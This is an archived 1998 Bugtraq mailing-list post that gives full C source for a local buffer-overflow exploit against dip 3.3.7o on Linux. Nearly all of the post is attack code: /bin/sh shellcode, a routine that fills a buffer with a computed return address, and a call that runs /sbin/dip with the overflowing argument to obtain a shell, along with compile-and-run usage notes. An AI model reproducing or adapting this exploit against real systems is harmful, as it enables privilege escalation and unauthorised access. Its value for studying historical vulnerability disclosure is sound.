dip 3.3.7 exploit
X-RDate: Sun, 10 May 1998 16:45:09 +0600 (YEKST)
X-UIDL: 35317d34000001e7
Date: Thu, 7 May 1998 20:06:47 +0000
From: jamez <jamez@UGROUND.ORG>
To: BUGTRAQ@NETSPACE.ORG
Subject: dip 3.3.7 exploit
Here an exploit for dip 3.3.7o buffer overflow.
----- cut here -----
/*
dip 3.3.7o buffer overflow exploit for Linux. (May 7, 1998)
coded by jamez. e-mail: jamez@uground.org
thanks to all ppl from uground.
usage:
gcc -o dip-exp dip3.3.7o-exp.c
./dip-exp offset (-100 to 100. probably 0. tested on slack 3.4)
*/
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
#define SIZE 130
/* cause it's a little buffer, i wont use NOP's */
char buffer[SIZE];
unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char * argv[])
{
int i = 0,
offset = 0;
long addr;
if(argc > 1) offset = atoi(argv[1]);
addr = get_esp() - offset - 0xcb;
for(i = 0; i < strlen(shellcode); i++)
buffer[i] = shellcode[i];
for (; i < SIZE; i += 4)
{
buffer[i ] = addr & 0x000000ff;
buffer[i+1] = (addr & 0x0000ff00) >> 8;
buffer[i+2] = (addr & 0x00ff0000) >> 16;
buffer[i+3] = (addr & 0xff000000) >> 24;
}
buffer[SIZE - 1] = 0;
execl("/sbin/dip", "dip", "-k", "-l", buffer, (char *)0);
}
----- cut here -----
--
jamez@uground.org
